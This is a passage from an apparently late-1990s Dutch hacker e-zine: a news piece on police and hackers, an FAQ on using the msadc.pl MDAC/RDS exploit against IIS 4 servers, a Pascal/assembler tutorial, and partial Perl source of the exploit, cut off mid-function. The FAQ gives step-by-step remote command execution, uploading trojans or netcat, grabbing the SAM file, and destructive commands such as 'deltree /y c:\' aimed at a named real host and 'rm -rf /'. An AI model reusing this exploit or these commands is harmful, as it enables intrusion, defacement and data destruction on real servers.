onder meer creditcardgegevens.
De politie is inmiddels vaardig in het nagaan van sporen die
cybercriminelen achterlaten. De bewijslast is langzamerhand
zodanig dat arrestaties mogelijk zijn.
Krakers te vriend houden
Een dilemma voor de politie is het vaststellen van de grens tussen
goed en kwaad. Onder de Wet computercriminaliteit is een poging
tot inbraak reeds een misdrijf. Die wet is echter niet meer van
deze tijd, wat bijvoorbeeld door de Hoge Raad in Noorwegen is
erkend: het openbaren van beveiligingslekken is niet langer een
misdrijf als aan bepaalde voorwaarden wordt voldaan. Hierdoor
kunnen krakers legaal de maatschappij en politie helpen bij het
bewaren van de veiligheid met pogingen om in te breken.
Nederlandse hackersorganisaties, waarvan Hit2000 de
belangrijkste oorsprong vormt, hanteren een code waarbij het niet
toegestaan is om gegevens te verminken of te stelen.
De uitvoering van het kraken volgens die code is echter niet te
controleren door betrokkenen zelf, wellicht vaak evenmin door de
politie.
De politie kan nauwelijks zonder de tips van hackers, maar
begeeft zich op glad ijs als ze zich afhankelijk maakt van wat
theoretisch beschouwd criminelen zijn. De schrik van de
IRT-affaire zit er goed in bij de politie.
Grote kraak ABP
Een van de zaken die speelt is een grote kraak in de databanken
van ABP, het grootste pensioenfonds in Nederland. De gegevens
van miljoenen pensioengerechtigden lagen, aldus de hackers, voor
het grijpen.
Uiteraard zijn ze er vanaf gebleven, maar de redactie van Planet
Multimedia kreeg wel een stukje bewijs in handen. Het gaat om
gevoelige gegevens.
Een van de hackers, telefonisch: 'Met de gegevens kun je je niet
enkel heel gemakkelijk online uitgeven voor die persoon, maar ook
telefonisch en zelfs voor loketten. Het is niet goed te praten dat
de ABP de gegevens niet goed beschermde.'
Deze kraak is al weer van enige tijd geleden, evenals eentje bij
Sudtours, waar het mogelijk bleek om reizen te boeken op
andermans naam en met andermans gegevens.
De kraker: 'Op zich gaat het onder ons om vrij onschuldige zaken,
maar voor kwaadwillenden zijn er interessante mogelijkheden om
via Internet waardevolle gegevens in handen te krijgen. Dat weet
de politie ook, en ik denk dat ze inderdaad een keer tot
arrestaties over zullen gaan, ook om een daad te stellen.'
(Bron: http://www.planet.nl/multimedia/1999/0211/g.shtml)
---------
04. MDAC
---------
(msadc.pl staat onderaan alle artikelen en is te downloaden op de website)
* Hoe gebruik ik mdac.pl?
Ah, deze vraag is (voor de verandering) niet zo stupide als hij lijkt, daar het
gebruiken van mdac wat lastiger is dan het gebruiken van andere kant en klare
hack programma's.
Het eerste dat gezegd dient te worden is dat mdac.pl zeker niet zo vaak werkt
als Russ Cooper (100% van alle IIS 4 servers - D0h) en Greg Gonzales (50% - nog
steeds een erg positieve schatting) claimden. De sploit werkt op het moment dat
het doelwit het MDAC 1.5 pakket heeft geinstalleerd en daarnaast
http://<foobar>/msadc/msadcs.dll publiekelijk toegankelijk is. Helaas ben ik
persoonlijk niet veel servers tegengekomen waarbij dit het geval was. Wel moet
ik zeggen dat de servers die kwetsbaar waren voor deze aanval hosting servers
waren van grote netwerken of "hoge status" sites. Hierbij noem ik onder andere
een betrekkelijk groot aantal sites van de NASA (overdreven veel IIS machines),
enkele NT hosting machines van WXS, Compuserve en anderen.
Het grootste probleem bij het gebruik van mdac is dat we een NT commando als
input geven maar de output niet te zien krijgen. Zo zal bijvoorbeeld het typen
van "dir" erin resulteren dat ons doelwit het "dir" commando uitvoert maar
sinds we de output niet krijgen te zien is dit commando niet nuttig voor ons.
Gelukkigerwijs staat Windows het ons toe om de output van een programma te
verwijzen naar een file mbv. de karakter sequenties ">" en ">>". Indien we
">" gebruiken zal het doelbestand overschreven worden en bij het gebruik van
">>" wordt de output aan het einde van het doelbestand toegevoegd. (Ik weet dat
dit allemaal wel erg basale kennis is, maar goed, dit is een FAQ en het gehalte
stompzinnige vragen dat een mens te verwerken krijgt is enorm. Vandaar dit
streven naar completie. Als er overigens iemand is die me kan vertellen hoe
ervoor gezorgd kan worden dat NT zijn output van stderr ipv. stdout naar een
file kan verwijzen ben ik hem dankbaar.
Nu, we verwijzen dus gewoon de output van een commando naar een file die op de
server met behulp van de browser toegankelijk is en we zijn klaar. Maar wacht,
als we de output willen verwijzen naar een file die we via de HTTP op kunnen
pikken moeten we de absolute locatie van de virtuele root directory van IIS
weten. (ie. www.foobar.com/scripts is niet afdoende - we hebben iets als
D:\InetPub\wwwroot\scripts nodig om naar te verwijzen).
We kunnen de heer BG weer dankbaar zijn voor het aanvoeren van een prima
oplossing voor dit probleem - de .idc bug. Door een non-existente path op te
geven naar een file met de extentie .idc zal IIS ons de absolute plek van de
non-existente file tonen.
Het opgeven van: www.foobar.com/wizard/default.asp.idc zal ons de volgende fout
melding geven:
The query file E:\opt2\http\WskProd\wizard\default.asp.idc could not
be opened. The file may not exist or you may have insufficient
permission to open the file.
Nu weten we naar welke directory we de output kunnen verwijzen!
Ergo, we gebruiken nu: "dir > E:\opt2\http\WskProd\wizard\output.txt" ipv.
kortweg "dir" en doen iets als "lynx www.foobar.com/wizard/output.txt" om de
output van ons commando te zien.
Oh, er blijkt een kleine fout te zitten in de broncode van mdac (ofwel gewoon
een programmeer fout, ofwel een met opzet geplaatste "fout" van rfp om
scriptkiddies de pas af te snijden. Het programma schijnt te kijken of een
HTTP server IIS 4.0 is of niet. Dit is een regel code die niet werkt en nogal
nutteloos is - een server die kwetsbaar is voor onze sploit zal sowieso IIS 4.0
draaien en er zijn zat IIS 4.0 servers die geen mdac hebben.
Ter extra informatie: mdac2 is uitgekomen voordat dit artikel af was - deze
versie is bruikbaar zonder dat hij gepatched dient te worden. Ik ben niet van
plan de extra "features" die mdac2 ons biedt hier te bespreken.
* Hey wacht, hoe deface ik een website met mdac?
Echo is uw bondgenoot...
Helaas laat Windows NT ons niet toe speciale karakters als ">" of "<" te
escapen zoals onder Linux wel mogelijk is. Dit is nogal zonde, want elke vorm
van een decente homepage heeft HTML nodig en HTML werkt jammergenoeg weer met
tags die een overdosis aan deze karakters bevatten. Dit betekend dat we een
site alleen kunnen defacen met plain text. Nah, dat is niks. We zullen een
trojan of netcat of iets dergelijks dat ons toe laat op de server zonder al te
veel moeilijkheden moeten installeren. Het enige probleem is hoe we iets zoals
dit gaan doen - de FTP client van windows werkt interactief en een van de
dingen die we NIET kunnen is interactief werken, of toch wel? De Windows FTP
client voorziet ons van een optie om niet-interactief te kunnen werken dmv. een
voorgedefinieerd FTP script welke de lijst bevat die de FTP client zal
uitvoeren nadat deze met de juiste parameter is gestart en connectie gemaakt
heeft. Dus echo-en we een mooi FTP script in elkaar op de server en gebruiken
nu een FTP command line om onze favoriete trojan (Bo?) of onze favoriete en veel
gebruikte TCP/IP zwitsers legermes te uploaden.
Een FTP script bij elkaar echo-en en FTP starten om onze favoriete tool up te
loaden moet natuurlijk ook mogelijk zijn zonder maar enige vorm van output te
zien. Maar het te zien krijgen van onze output is een goede manier om te
beoordelen of mdac.pl werkt en het MDAC pakket niet gepatched is. De repair sam
in een publieke directory zetten en cracken is ook een goed idee, omdat we
hierna prima in staat zijn de WinNT ftp server op te starten met wat net
commando's. Administrator paswoord wijzigen is natuurlijk weer erg hard, maar
zeker ook effectief wijzigen is natuurlijk weer erg hard, maar
zeker ook effectief.
Om een compleet voorbeeld te geven:
scrippie:~# perl -x ~/mdac.pl -h www.f00b4r.c0m
-- RDS exploit by rain forest puppy / ADM / Wiretrip --
Please type the NT commandline you want to run (cmd /c assumed):
cmd /c tlist > E:\opt2\http\WskProd\wizard\foorbar.txt
Step 1: Trying raw driver to btcustmr.mdb
winnt -> c:
Success!
(Of voor de malicieuze crackertjes onder ons:
I_AM_LAME_AND_MALICIOUS:~# perl -x ~/mdac.pl -h www.windesheim.nl
-- RDS exploit by rain forest puppy / ADM / Wiretrip --
Please type the NT commandline you want to run (cmd /c assumed):
cmd /c deltree /y c:\
Step 1: Trying raw driver to btcustmr.mdb
winnt -> c:
Success!
Vergeet niet als de server hierna nog draait even D: en E: mee te nemen.)
Nu doen we:
scrippie:~# lynx www.f00b4r.c0m/wizard/foobar.txt
En daar zijn we - een task list (mits het juiste service pack op de machiene
staat dat is) - en beter nog, we weten dat deze bak kwetsbaar is.
* Hey, wacht es, die .idc bug werkt helemaal niet en ik wil de output van mijn
commando's zien!
Gelukkig heeft de RDS exploit zelf nog een manier bij de hand om informatie te
verzamelen aangaande de directory structuur van de server - de mogelijkheid om
de server index tabel te 'dumpen'. De reden dat ik de .idc fout eerst besproken
heb is omdat deze vele malen sneller werkt dan de hele index tabel van de
server te dumpen - zeker als het om een grote file gaat. De index server dump
kan als volgt verkregen worden: perl -x ~/mdac.pl -X -h mail.big-brother.nl
Zoek hier even de directory in terug die de belangstelling heeft. (En JA, BB is
al gepatched, ondanks dat je zo'n mooie dump krijgt... :-)
* Ik kan de index tabel niet dumpen en ook .idc breng geen uitkomst!
Probeer de standaard NT directories waar de homepages zich bevinden:
C:\InetPub\wwwroot\
D:\InetPub\wwwroot\
E:\InetPub\wwwroot\
Vele variaties mogelijk tot het U gaat irriteren.
Als jullie een andere manier vinden om het absolute pad van de virtuele root
directory van IIS te achterhalen - laat het me weten.
* Vertel meer over mdac.pl
Nah, als je het nu nog niet snapt kan je beter iets anders gaan doen met je
vrije tijd dan hacken - lap de ramen van moeder eens ofzo.
- L4m3rZ Z3ntR4l
* Ik wil bakken op een LAN verneuken - help me
Koop een hamer.
* Hoe hack ik met telnet?
Probeer eens: "telnet <doelwit> ; rm -r -f /"
* Duh, ik weet al wat rm -rf / doet met mijn Linux partitie - geef aub serieus
antwoord op mijn telnet vraag!
Okay, sorry, foutje van me...
Gebruik "telnet <target> ; dd if=/dev/urandom of=/dev/hda"
* Cheers! Wat doet dd?
Dit commando geeft je de mogelijkheid te hacken met telnet...
* Wat is je favoriete Denial of Service aanval?
Een grote vrachtwagen parkeren middenin de enige straat naar het parkeerterrein
van het winkelcentrum bij ons thuis.
-------------------------------------------------------------------------------
Aan hen die mijn private exploits op publieke hackers kanalen roepen:
- STERFT
-----------------------------
05. Programmeren in Pascal 3
-----------------------------
- = Programmeren in Pascal = -
Door: RaViTy / HaVeN
1. Introductie
2. Schrijven of lezen van poorten (1)
3. Assembler
- Inleiding
- Hexadecimaal
- Registers
- Segmenten en offsets
- Waarden toekennen aan registers
- Rekenfuncties
- Het schrijven of lezen van poorten (2 In assembler)
INTRODUCTIE
Eej! Het is dat Zer0 Vince vandaag op school vroeg waar de volgende tutor
bleef.
Ik was jullie al weer helemaal vergeten.
Tja, alles ging mij voor de wind sinds Zer0 Vince op vakantie was, dus
dan denk je niet meer aan de hackertjes ;)
Maar goed ff terzake, ik wist natuurlijk niet meer waar ik gebleven was
met bullshit vertellen, dus begin ik gewoon maar ergens mee.
Overigens is het mij opgevallen dat onder Windows (ja Windows) de ASCII
tekens wegvallen. :( Dus lees h4h maar lekker in DOS ofzo.
OK, nou even over het programmeren.
Borland Pascal (tot en met versie 7) en Turbo Pascal zuigen! Dit heb ik
al lang ondervonden, en de ervaren programmeurs van hack-programma's ook.
16 bit is NIET cool, niet snel en niet effecient. Je kunt om deze bugs
heenwerken, maar helaas moet je dan heel veel hardcore-assembler schrijven
en daar heeft niemand zin in.
Daarom raad ik jullie aan om in BP en TP te schrijven, omdat de interface zo
bot is, en TMT-Pascal te gebruiken voor het compileren. (www.tmt.com)
TMT pascal is 32 bit en heeft Windows, Linux en Unix ondersteuning.
Bovendien programmeer je dan Protected mode.
2. SCHRIJVEN OF LEZEN VAN POORTEN
Nou wordt het voor hackers pas echt interessant, want communiceren via
seriele (COM) en paralelle poorten is wat een hacker graag doet.
Je kunt een poort checken door er een bericht naar te sturen. Dit
doe je zo:
PORT[poortnummer]:=waarde;
Hier is poortnummer het nummer van het apparaat wat je aan wilt sturen,
en waarde is het nummer van het berichtje dat je wilt sturen.
Als je de waarde wilt lezen doe je dit natuurlijk andersom:
waarde:=PORT[poortnummer];
Als je de invoer van het toetsenbord (poortnummer $60) wilt lezen dan kun
je dit doen:
repeat
.. { Hier staat jouw bullshit }
until port[$60]=1; {1 staat voor de escape-toets }
Dit was even een hele simpele en globale uitleg van het schrijven en lezen
van poorten, want die heb je nog vaak nodig.
3. ASSEMBLER
Oh jee... Hier komt het, hetgene waar alle beginnende programmeurs bang
voor zijn: ASSEMBLER.
Ik zal proberen het uit te leggen, want assembler is helemaal niet
moeilijk, maar de eerste stappen kunnen zwaar zijn.
Als je in je programma assembler op wilt nemen kun je dit op twee manieren
doen: intern en extern.
Ik behandel alleen interne assembler, want anders moet ik ook nog eens
uitleggen hoe TASM werkt, en daar heb ik nu geen zin in. Misschien later
nog een keer.
- Ok, hoe kan ik assembler invoegen?
Dit is heel simpel, het werkt net zo als "begin .. end" maar nu is het
"asm .. end". Simpel he?
Bijvoorbeeld:
asm
mov ax, 13h
int 10h
end;
Sommigen van jullie zullen misschien wel weten wat dit doet. Hiermee krijg
je toegang tot een grafische modus, mode 13h genaamd. De beeldresolutie is
320x200 en je mag tot maximaal 256 kleuren samenstellen uit rood, groen en
blauw. Ingewikkeld? Maakt niet uit, je zult het waarschijnlijk nooit
snappen ;)
Eem voordeel van assembler is dat het de processor op hardware niveau
aanstuurt. Nog een voordeel is dat alles wat je niet kan doen met standaard
pascal wel in assembler kan doen. Een nadeel is dat interrupts best
ingewikkeld zijn, assembler is gewoon een onverklaarbare taal. Als ik dus
een vraag hoor van "waarom is dat?" dan geef ik als antwoord "Dat is gewoon
zo".
HEXADECIMAAL
Geen probleem, dit is gewoon een andere manier van tellen. In plaats van
0 tot 10 tel je in het hexadecimaal van 0 tot F (eigenlijk van 0 tot 15
is dus 16). 0123456789ABCDEF
Je kunt gemakkelijk een hexadecimaal getal omrekenen naar een 'gewoon'
getal.
Neem bijvoorbeeld 13h:
13h = 1 x 16 + 3 = 19
Oftewel: Hexadecimaal = eerste letter van het hexa-getal + de rest.
Nog een voorbeeld 0Fh:
0Fh = 0 x 16 + F = 16 { Let op: F = 16 }
Ik vertelde dit alleen maar omdat assembler om het hexadecimale stelsel
draait. Hoe je in bits en bytes moet tellen hoor je al lang te weten.
- REGISTERS
Registers kun je zien als variabele met een vaste naam. Je kunt net als
in een variabele een waarde opslaan. Je hebt verschillende soorten
registers. Je hebt reken-registers en registers met een speciale functie.
Helaas zijn de registers anders, voor elke processor. Je hebt (vooral)
16-bit en 32-bit registers. Ik behandel de 16-bit registers, omdat die
toch ongeveer hetzelfde werken als de 32-bits registers.
Even een rijtje registers:
AX 16-bit reken-register, het bestaat uit AL en AH
AX = AL + AH AL is de LoValue en AH de HiValue.
BX 16-bit reken-register, het bestaat uit BL en BH
BX = BL + BH bx kan een speciale functie hebben!
CX 16-bit reken-register, het bestaat uit CL en CH
DX 16-bit reken-register, kan speciale functie hebben!
Dat Hi en Lo geld natuurlijk voor alle reken-registers. Dit waren er maar
een paar ;)
In registers kun je helaas alleen maar hele getallen in opslaan. Dus als
je een real of floating point getal wilt opslaan moet je het deel voor- en
achter de komma opslaan in aparte registers :(
- SEGMENTEN EN OFFSETS
Dit schijnt een moeilijk geval te zijn, maar ik vond het gemakkelijk.
Omdat boeken veel te veel informatie tegelijk geven raak je door de bomen
het bos wel eens kwijt. Daarom blijf ik heel beknopt in de hoop dat jullie
het snappen.
Segmenten:
In elke programmeertaal heb je wel met segmenten temaken. Soms zijn ze
goed verstopt, en de beginnende programmeur ziet ze niet. Dit is zo het
geval bij pascal en c++. Als je een programma maakt werk je eigenlijk in
drie delen (segmenten). Ik teken het hieronder even uit:
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º STACK º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º DATA º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º CODE º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Het code-segment is het gemakkelijkst, iedereen heeft deze immers al
gebruikt, misschien zonder ze dat zelf wisten. Hier staan namelijk alle
instructies, zoals writeln.
Het data-segment heeft ook iedereen gebruikt (als het goed is). Dit is
namelijk de plek waar je je variabelen benoemd. "var getal:integer;"
bijvoorbeeld, dit soort instructies wordt opgeslagen in het data-segment.
Het stack-segment is misschien nieuw voor de meesten. Dit is namelijk de
plek waar je geheugen kunt reserveren. De meeste C/C++/Pascal programmeurs
houden zich h
1a2c
ier niet mee bezig, omdat de reedsgenoemde programmeertalen
het geheugen zelf reserveren. Je kunt in pascal de stack wel wijzigen met
compilerdirectives. {$M} is hiervan een voorbeeld.
In assembler moet je met al deze segmenten rekening houden, want 1 foutje
kan fataal zijn. Ik kan het weten, want ik heb al een monitor opgeblazen
door met het CRCT register te klooien. Hiermee maakte ik de beeldresolutie
'iets' te hoog (zeg maar 3200x2000) en dat vond mijn beeldscherm niet leuk.
Maar goed, als jullie nou maar van dat register afblijven dan is er niks
aan de hand, je computer loopt hoogstens vast.
Sinds de 80286 processoren (dacht ik) heb je een extra segment tot je
beschikking: Het extra segment ES. Hierin kun je tijdelijk waarden in
opslaan.
- OFFSETS
Offsets zijn plaatsen in een segment. Ik zal met een tekening proberen het
een en ander duidelijk te maken:
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º0123>56789 DATA º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Hierboven zie je het data-segment. De offset heb ik aangegeven met een
pijltje ( > ). Een offset is dus niks anders dan een plaats in het geheugen
(of data-segment). Ik maak even een leuk verhaaltje eromheen:
Stel je hebt een telefoonboek. Het telefoonboek is het segment. Het
telefoonboek-segment. Nu wil ik een telefoon-nummer opzoeken. Ik weet
alleen hoe die kerel (of dat meisje) heet, en waar hij woont. Nu is
het niet efficient om vanaf het begin van het telefoonboek alle nummers
na te gaan. Dat kost immers teveel tijd. Aangezien je weet dat HIJ in
Schijndel woont, of ZIJ in Dinther kun je beter bij Schijndel, of Dinther
kijken dan beginnen bij Den Bosh en zo langzaam verder.
Schijndel-Dinther is nu de offset. De plaats in het telefoonboek.
Ik hoop dat het nu duidelijk is ;)
Overigens heb ik op TakeOver '99, een soort underground multimedia party,
flyers gezien van #hit2000, je kon niet missen, iedereen gooide ze weg
en de hele hal lag onder de #hit2000 en de Contour/TBL flyers :)
-WAARDEN TOEKENNEN AAN REGISTERS
Zoals ik reeds verteld heb zijn registers een soort statische variabele,
soms met een bepaalde functie, waar je waarden in kan 'storten'.
Stel je voor dat je aan register AX de waarde 13h wilt geven, in pascal
zou je ongeveer zo doen:
AX:=13h;
Maar in assembler moet dat zo
mov ax, 13h
Je noemt dus eerst de naam van het register, dan schrijf de een komma, en
daarna geef je de waarde die je in het register op wilt slaan.
mov ax, 13h { ax:=13h }
mov bx, ax { bx:=ax }
REKENFUNCTIES
Een groot voordeel van assembler voor demo/spellen-programmeurs (zoals ik)
is de snelheid waarmee het informatie verwerkt. Als je AX zou willen
optellen bij BX krijg je in pascal "BX:=BX+AX" of "INC(BX,AX);" maar
in assembler gebruik je ADD:
asm
mov ax, 2
mov bx, 5
add bx, ax
end;
Hier is ax=2 en bx=5, en gebruik ik ADD om op te tellen. De oplossing wordt
in het eerstgenoemde register na ADD opgeslagen, hier dus BX. BX bevat nu
de waarde 7.
Als je bij AX ‚‚n zou willen optellen dan gebruik je INC:
asm
mov ax, 2
inc ax
end;
Hieronder zijn nog een paar rekenfuncties:
- INC increase ofwel "vermeerderen"
- DEC decrease ofwel "verminderen"
- MUL multiply ofwel "vermenigvuldigen"
- DIV divide ofwel "delen"
De andere functies kun je zelf maken met deze functies.
Stel dat je Quake 3: arena ging namaken in pascal, dan moet je ten eerste
32-bit code gebruiken, maar je moet ook optimaliseren. Dat wil zeggen dat
je zo min mogelijk instructies gebruikt, en mogelijk de snelste functies.
Vooral MUL en DIV zijn langzaam, hier zijn betere manieren voor.
Als je iets wilt vermenigvuldigen, gebruik dan SHL en SHR, oftewel, Shift-
Left en Shift-Right. Schuiven dus. SHL is vermenigvuldigen en SHR is
delen, maar hier schuilt een addertje onder het gras:
Stel je wilt AX vermenigvuldigen met 128 dan doe jij "mul ax, 128"
(of was het imul?)
AAAARRGGHHH... Dat moet je niet doen! Doe dit: "shl ax, 7"
Want: SHL ax, 7 betekend ax*2*2*2*2*2*2*2; oftewel 2 tot de zevende.
SHL ax, 4 betekend ax*2*2*2*2; oftewel 2 tot de vierde.
(let op het aantal 2-'tjes SHL 7 zijn dus zeven 2-'tjes)
Maar, ik hoor jullie al denken, stel ik wil de waarde 320. Ik kan toch
nooit een getal tot de tweede doen en dan 320 krijgen? Want SHL 8 (=256)
is te laag, en SHL 9 (=512) is weer te groot?
Nou, doe niet moeilijk, dan doe je toch SHL 8 + SHL 6! Want, SHL (256) +
SHL 6 (64) = 256+64 = 320. Viola! Simpel toch?
SHR werkt gewoon hetzelfde.
- HET SCHRIJVEN OF LEZEN VAN POORTEN IN ASSEMBLER
Ah.. Heerlijk al dat assembler :)
Ik probeer in deze tutorial nog even de puntjes op de i te zitten, zodat
de nephackertjes nu rustig de source-code van BO2 kunnen ontcijferen.
Er wordt namelijk in dat soort programma's vaak gebruik gemaakt van
gewone 'PORT[poortnummer]:=waarde;' functies, maar in een 'onleesbaar'
assembler-jasje.
Stel dat je doet: Port[$3c8]:=kleur; In assembler wordt dit:
asm
mov dx, $3c8
mov al, kleur
out dx, al
end;
In dit voorbeeld bewaar ik in register DX het poortnummer, en daarna in
AL de variabele kleur. OUT = PORT[poortnummer]:=waarde;
IN = Waarde:=PORT[poortnummer];
Dus andersom, ik wil juist een waarde ontvangen van poort DX in AL:
asm
mov dx, $3c7
in al, dx
end;
Hopla! Nu zit de waarde die in poortnummer $3c7 gevonden is in register AL.
Leuk he?
Fjew.. Dat is weer genoeg assembler voor deze keer.
Er zullen natuurlijk ook een paar gevorderde assembler programmeurs dit
gelezen hebben, die misschien zullen zeggen dat ik dingen als Stack
niet precies volgens de regels uitleg, who cares? Ik probeer alleen maar
alles duidelijk te maken, en soms maak je het onnodig moeilijk door al die
officiele termen.
Zeg als er vragen, opmerkingen, kritiek of suggesties zijn, Email
ze even naar nkeetels@wishmail.net
Ik sta open voor alle kritiek. Misschien heb je een suggestie voor
toekomstige tutorials.
Als er veel vragen van verschillende mensen op hetzelfde neer komen,
kan ik er misschien een hele tutorial aan besteden. Op kleine vragen zal
ik persoonlijk antwoord geven via Email. (vergeet het emailadres niet in
te vullen)
-------------------
msadc.pl
--------------------
#!/usr/bin/perl
#
# MSADC/RDS 'usage' (aka exploit) script version 2
#
# by rain forest puppy
#
# - added UNC support, really didn't clean up code, but oh well
use Socket; use Getopt::Std;
getopts("e:vd:h:XRVNwcu:s:", \%args);
print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n";
if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h <host> { -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <\\\\host\\share\\file> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s <number> = run only step <number>
Or a -R will resume a (v2) command session
~; exit;}
###########################################################
# config data
@drives=("c","d","e","f","g","h");
@sysdirs=("winnt","winnt35","winnt351","win","windows");
# we want 'wicca' first, because if step 2 made the DSN, it's ready to go
@dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
"banner", "banners", "ads", "ADCDemo", "ADCTest");
# this is sparse, because I don't know of many
@sysmdbs=( "\\catroot\\icatalog.mdb",
"\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
"\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
"\\system32\\certmdb.mdb",
"\\system32\\ias\\ias.mdb",
"\\system32\\ias\dnary.mdb",
"\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%
@mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
"\\cfusion\\cfapps\\forums\\forums_.mdb",
"\\cfusion\\cfapps\\forums\\data\\forums.mdb",
"\\cfusion\\cfapps\\security\\realm_.mdb",
"\\cfusion\\cfapps\\security\\data\\realm.mdb",
"\\cfusion\\database\\cfexamples.mdb",
"\\cfusion\\database\\cfsnippets.mdb",
"\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
"\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
"\\cfusion\\brighttiger\\database\\cleam.mdb",
"\\cfusion\\database\\smpolicy.mdb",
"\\cfusion\\database\cypress.mdb",
"\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
"\\website\\cgi-win\\dbsample.mdb",
"\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
"\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
); #these are just \
###########################################################
$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
if(!defined $args{R}){ $target= inet_aton($ip)
|| die("inet_aton problems; host doesn't exist?");}
if (!defined $args{R}){ $ret = &has_msadc; }
if (defined $args{X}) { &hork_idx; exit; }
if (defined $args{N}) { &get_name; exit; }
if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
if (defined $args{R}) { &load; exit; }
print "Type the command line you want to run ($comm assumed):\n"
. "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;
if (!defined $args{s} || $args{s}==1){
print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
&try_btcustmr;}
if (!defined $args{s} || $args{s}==2){
print "\nStep 2: Trying to make our own DSN...";
if (&make_dsn){ print "<<success>>\n"; sleep(3); } else {
print "<<fail>>\n"; }} # we need to sleep to let the server catchup
if (!defined $args{s} || $args{s}==3){
print "\nStep 3: Trying known DSNs...";
&known_dsn;}
if (!defined $args{s} || $args{s}==4){
print "\nStep 4: Trying known .mdbs...";
&known_mdb;}
if (!defined $args{s} || $args{s}==5){
if (defined $args{u}){
print "\xStep 5: Trying UNC...";
&use_unc; } else { "\nNo -u; Step 5 skipped.\n"; }}
if (!defined $args{s} || $args{s}==6){
if (defined $args{e}){
print "\nStep 6: Trying dictionary of DSN names...";
&dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; }}
print "\n\nNo luck, guess you'll have to use a real hack, eh?\n";
exit;
##############################################################################
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
open(OUT,">raw.out"); my @in;
select(S); $|=1; print $pstr;
while(<S>){ print OUT $_; push @in, $_;
print STDOUT "." if(defined $args{X});}
close(OUT); select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }}
##############################################################################
sub make_header { # make the HTTP request
my $aa, $bb;
if (defined $args{V}){
$aa="VbBusObj.VbBusObjCls.GetRecordset";
$bb="2";
} else {
$aa="AdvancedDataFactory.Query";
$bb="3";}
$msadc=<<EOT
POST /msadc/msadcs.dll/$aa HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: $clen
Connection: Keep-Alive
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=$bb
--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen
EOT
;
$msadc=~s/\n/\r\n/g;
return $msadc;}
##############################################################################
sub make_req { # make the RDS request
my ($switch, $p1, $p2)=@_;
my $req=""; my $t1, $t2, $query, $dsn;
if ($switch==1){ # this is the btcustmr.mdb query
$query="Select * from Customers where City='|shell(\"$command\")|'";
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
$p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}
elsif ($switch==2){ # this is general make table query
$query="create table AZZ (B int, C varchar(10))";
$dsn="$p1";}
elsif ($switch==3){ # this is general exploit table query
$query="select * from AZZ where C='|shell(\"$command\")|'";
$dsn="$p1";}
elsif ($switch==4){ # attempt to hork file info from index server
$query="select path from scope()";
$dsn="Provider=MSIDXS;";}
elsif ($switch==5){ # bad query
$query="select";
$dsn="$p1";}
elsif ($switch==6){ # this is table-independant query (new)
$query="select * from MSysModules where name='|shell(\"$command\")|'";
$dsn="$p1";}
$t1= make_unicode($query);
$t2= make_unicode($dsn);
if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; }
$req.= "\x08\x00" . pack ("S1", length($t1));
$req.= "\x00\x00" . $t1 ;
$req.= "\x08\x00" . pack ("S1", length($t2));
$req.= "\x00\x00" . $t2 ;
$req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n";
return $req;}
##############################################################################
sub make_unicode { # quick little function to convert to unicode
my ($in)=@_; my $out;
for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
return $out;}
##############################################################################
sub rdo_success { # checks for RDO return success (this is kludge)
